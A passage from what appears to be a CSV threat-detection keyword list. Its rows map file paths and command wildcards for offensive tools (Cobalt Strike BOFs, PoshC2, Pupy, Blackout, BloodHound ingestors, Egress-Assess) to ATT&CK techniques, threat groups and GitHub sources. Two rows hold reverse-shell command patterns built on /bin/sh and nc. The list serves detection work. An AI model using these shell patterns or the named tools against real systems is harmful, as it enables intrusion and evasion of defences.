APT29,C2,https://github.com/kyleavery/AceLdr,1,1,N/A,10,10,712,123,2023-09-28T19:47:03Z,2022-08-11T00:06:09Z -*/bin/fake-sms*,offensive_tool_keyword,fake-sms,A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.,T1598.003 - T1514,TA0003 - TA0009,N/A,N/A,Defense Evasion,https://github.com/Narasimha1997/fake-sms,1,0,N/A,8,10,2513,167,2023-08-01T15:34:41Z,2021-02-18T15:18:50Z -*/bin/gorsair *,offensive_tool_keyword,Gorsair,Gorsair hacks its way into remote docker containers that expose their APIs,T1552,TA0006,N/A,N/A,Exploitation tools,https://github.com/Ullaakut/Gorsair,1,0,N/A,N/A,9,825,74,2023-09-09T13:18:33Z,2018-08-02T16:49:14Z 
-*/bin/hakrawler*,offensive_tool_keyword,hakrawler,Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application,T1190 - T1212 - T1087.001,TA0007 - TA0003 - TA0009,N/A,N/A,Web Attacks,https://github.com/hakluke/hakrawler,1,0,N/A,6,10,3967,458,2023-07-22T19:39:11Z,2019-12-15T13:54:43Z -*/bin/posh*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/bin/pupysh*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/bin/read_i.php?a1=step2-down-b&a2=*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/bin/read_i.php?a1=step2-down-c&a2=*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/bin/read_i.php?a1=step2-down-j&a2=*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/bin/read_i.php?a1=step2-down-k&a2=*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection 
capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/bin/read_i.php?a1=step2-down-r&a2=*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/bin/read_i.php?a1=step2-down-u&a2=*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/bin/sh | nc*,greyware_tool_keyword,shell,Reverse Shell Command Line,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml,1,0,greyware tool - risks of False positive !,N/A,10,6749,1943,2023-10-03T04:55:17Z,2016-12-24T09:48:49Z -*/bin/sh -i <&3 >&3 2>&3*,greyware_tool_keyword,shell,Reverse Shell Command Line,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml,1,0,greyware tool - risks of False positive !,N/A,10,6749,1943,2023-10-03T04:55:17Z,2016-12-24T09:48:49Z -*/bin/Sleeper.o*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,1,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*/bin/unshackle*,offensive_tool_keyword,unshackle,Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux,T1110.004 - T1059.004 - T1070.004,TA0006 - TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Fadi002/unshackle,1,0,N/A,10,10,1482,83,2023-09-23T15:54:14Z,2023-07-19T22:30:28Z -*/bin/wapiti*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*/bind_powershell.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/bin-sploits/*.zip*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/BITB.git*,offensive_tool_keyword,bitb,Browser templates for Browser In The Browser (BITB) attack,T1056.001 - T1134 - T1090,TA0005 - TA0006 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/mrd0x/BITB,1,1,N/A,10,10,2645,463,2023-07-11T04:57:46Z,2022-03-15T16:51:39Z -*/BITB-main*,offensive_tool_keyword,bitb,Browser templates for Browser In The Browser (BITB) attack,T1056.001 - T1134 - T1090,TA0005 - TA0006 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/mrd0x/BITB,1,0,N/A,10,10,2645,463,2023-07-11T04:57:46Z,2022-03-15T16:51:39Z -*/bitcoin-getaddr.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/bitcoin-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/bitcoinrpc-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/bitsadmin/bitsadmin.cmd*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/BitsArbitraryFileMove*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/bittorrent-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/bjnp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Blackout.cpp*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,1,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -*/Blackout.exe*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,1,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -*/Blackout.git*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,1,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z 
-*/Blackout.sln*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,1,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -*/Blackout.sys*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,1,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -*/blindeventlog.exe*,offensive_tool_keyword,DarkWidow,Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140,TA0005 - TA0003 - TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/reveng007/DarkWidow,1,1,N/A,10,3,268,38,2023-08-03T22:37:44Z,2023-07-24T13:59:16Z -*/blob/main/write_anything.c*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0008,N/A,N/A,Exploitation tools,https://github.com/gyaansastra/CVE-2022-0847,1,1,N/A,N/A,1,1,2,2022-03-20T15:46:04Z,2022-03-09T15:44:58Z -*/BlockEtw.git*,offensive_tool_keyword,BlockEtw,.Net Assembly to block ETW telemetry in current process,T1055.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Soledge/BlockEtw,1,1,N/A,10,1,73,20,2020-05-14T19:24:49Z,2020-05-14T02:40:50Z -*/BlockOpenHandle.git*,offensive_tool_keyword,BlockOpenHandle,Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners,T1050.005 - T1480,TA0005,N/A,N/A,Defense 
Evasion,https://github.com/TheD1rkMtr/BlockOpenHandle,1,1,N/A,9,2,149,21,2023-04-27T05:42:51Z,2023-04-27T05:40:47Z -*/bloodhound.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/bloodhound.py*,offensive_tool_keyword,crackmapexec,bloodhound integration with crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/bloodhound/enumeration*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*/bloodhound_domain.py*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*/bloodhound_domaintrust.py*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*/bloodhound_gpo.py*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*/bloodhound_object.py*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - 
T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*/bloodhound_ou.py*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*/bloodhound_schema.py*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*/bloodhound-data*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*/bloodhound-quickwin.git*,offensive_tool_keyword,bloodhound-quickwin,Simple script to extract useful informations from the combo BloodHound + Neo4j,T1087 - T1087.001 - T1018 - T1069 - T1069.002,TA0007 - TA0003 - TA0004,N/A,N/A,AD Enumeration,https://github.com/kaluche/bloodhound-quickwin,1,1,N/A,6,2,162,17,2023-07-17T14:31:51Z,2021-02-16T16:04:16Z -*/bloodyAD.git*,offensive_tool_keyword,bloodyAD,BloodyAD is an Active Directory Privilege Escalation Framework,T1078.004 - T1059.003 - T1071.001,TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/bloodyAD,1,1,N/A,10,9,883,96,2023-09-01T09:12:45Z,2021-10-11T15:07:26Z -*/bluscreenofjeff/*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*/Bo0oM*,offensive_tool_keyword,Github Username,Github username known for exploitation tools. Web application security researcher. Current Location: Moscow. 
Russia,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/Bo0oM,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/bof.cpp *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/bof.h,offensive_tool_keyword,cobaltstrike,Collection of beacon object files for use with Cobalt Strike to facilitate,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 
- T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rookuu/BOFs,1,0,N/A,10,10,156,26,2021-02-11T10:48:12Z,2021-02-11T10:28:48Z -*/BOF.NET/*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*/bof.nim,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF Files with Nim!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/byt3bl33d3r/BOF-Nim,1,1,N/A,10,10,83,12,2022-07-10T22:12:10Z,2021-01-12T18:58:23Z -*/bof.x64.o*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 